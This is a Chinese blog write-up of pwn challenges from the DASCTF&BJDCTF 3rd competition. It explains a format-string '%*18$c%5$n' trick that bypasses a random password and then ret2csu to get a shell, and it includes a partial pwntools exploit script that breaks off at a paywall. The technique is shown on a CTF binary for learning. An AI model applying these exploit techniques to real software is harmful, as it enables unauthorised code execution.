DASCTF&BJDCTF 3rd 三道PWN题复现

最新推荐文章于 2023-06-05 19:18:21 发布
最新推荐文章于 2023-06-05 19:18:21 发布
阅读量860 收藏
点赞数 1
分类专栏: CTF复现 文章标签: pwn IO ret2csu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/106883712
版权

最近看了一下上次安恒五月赛没做出的几道PWN题,感觉自己水平还是不够,还要多学习

easybabystack(格式化字符串*, ret2csu)

这题有个栈溢出漏洞
在这里插入图片描述
但是必须输入正确的密码,否则就直接退出了
在这里插入图片描述
还有个格式化字符串漏洞
在这里插入图片描述
字符串长度为12
在这里插入图片描述
由于密码是/dev/urandom生成的,无法预测。
这里需要利用格式化字符串漏洞的’*'号

%*num$d从栈中取变量作为N
比如num$处的值是0x100,那么这个格式化字符串就相当于%256d

而密码位于18$的位置,我们使用%*18$c就可以打印出密码那么长的字符串,然后%5$n写到输入的密码处即可
不过这里如果密码太大可能会失败,需要多试几次,数字比较小的时候容易成功
完成后用ret2csu就能getshell

from pwn import *

#r = remote("183.129.189.60", 10001)
r = process("./easybabystack")
context(arch='amd64', os='linux', log_level='debug')
DEBUG = 1
if DEBUG:
	gdb.attach(r, 
	'''	
	b *0x4014A5
	b *0x401512
	b *0x4016C7
	b *0x401726
	b *0x40171D
	c
	''')
r.recvuntil("username: ")
#name = '%p:%p:%p:%p\n'
#name = '%6$p\n'
name = '%*18$c%5$n\n'
r.send(name)
r.recvuntil("passwd: ")
r
最低0.47元/天 解锁文章
L.o.W
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF三月赛
weixin_44687621的博客
04-10 3183
DASCTF2022.3部分目 Web ezpop 目源码如下 <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin {
pwnDASCTF Sept 九月赛
woodwhale的博客
09-26 3691
pwnDASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 851
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 242
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
DASCTF 2023六月挑战赛|二进制专项 PWN
weixin_51890658的博客
06-05 400
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
pwn练习附件四道含exp
11-21
个人pwn练习目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
07-11
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
pwn栈溢出10道练习有writeup
01-04
pwn栈溢出练习目,每都有writeup.
PWN的逆向分析策略.docx
01-10
PWN的逆向分析策略.docx
Writeup.rar
12-01
Writeup.rar
DASCTF&BJDCTF 3rd 部分writeup
weixin_44145820的博客
05-24 3049
目录MiscVm MiscVm addr = 0x203020 ans = [] for i in range(32): tmp = hex(Dword(addr+i*4)) print(tmp) ans.append(tmp[:-1]) print ans
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1296
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF 三月赛 逆向replace】
chuxuezhewocao的博客
07-01 327
2021年DASCTF三月赛逆向部分的学习,这个又是一道程序运行时修改了特定函数的保护属性,从而在函数内部写入了其他函数的内存地址,达到跳转的目的,之前好像遇到过类似的目,但这个目一开始仍然没有分析出来,后面看了其他师傅的WP后有了思路,从头到尾独立完成了下,在此做一记录。目上来一看,貌似逻辑挺简单: 貌似很简单,然后bytes.fromhex,异或回去,得到了一个 很好假flag,意料之中,怎么可能这么简单,然后就不会了,之后学习了一下,关键地方还是在: 这里1这部分是获取了IsDebuggerP
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 286
是7月末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 492
DASCTF 7月赋能赛pwn wp
DASCTF-hehepwn writeup
One_p_Two_w的博客
09-28 204
DASCTF-hehepwn writeup 已上传网盘,方便复现 链接:https://pan.baidu.com/s/1ceYwALaUJn6TIS2eK9TN8w 提取码:ynzg 分析程序 没有开启任何保护,这里注意到开启了栈可执行,存在rwx字段,那么之后可以尝试在栈上执行ret2shellcode 使用ida分析程序 在这里可以看到存在堆上内容的泄露 strdup:strdup()会先用maolloc()配置与参数s 字符串相同的空间大小,然后将参数s 字符串的内容复制到该内存地址,然后把该
MAR DASCTF明御攻防赛
Sakura给爷pwn全场
03-31 846
MAR DASCTF明御攻防赛 PWN、RE Writeup: https://www.anquanke.com/post/id/236178
BJDCTF2020(复现)-MISC
Arescat的博客
07-06 776
目录签个到纳尼鸡你太美just a rar藏藏藏一叶障目认真你就输了你猜我是个啥 签个到 打开目,提示压缩包损坏,winhex查看文件格式 改后缀为png,打开是一个二维码,扫码即得 xaflag{i_am_a_tupian} 纳尼 补上gif文件头,stegsolve提取每一帧的字符,连接起来 Q1RGe3d hbmdfYm FvX3FpYW5n X2lzX3NhZH0= Base64解密 鸡你太美 两张gif,winhex进行类比,发现副本的缺少gif文件头,补上文件头保存 just a ra
ctf 简单pwn资源
最新发布
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值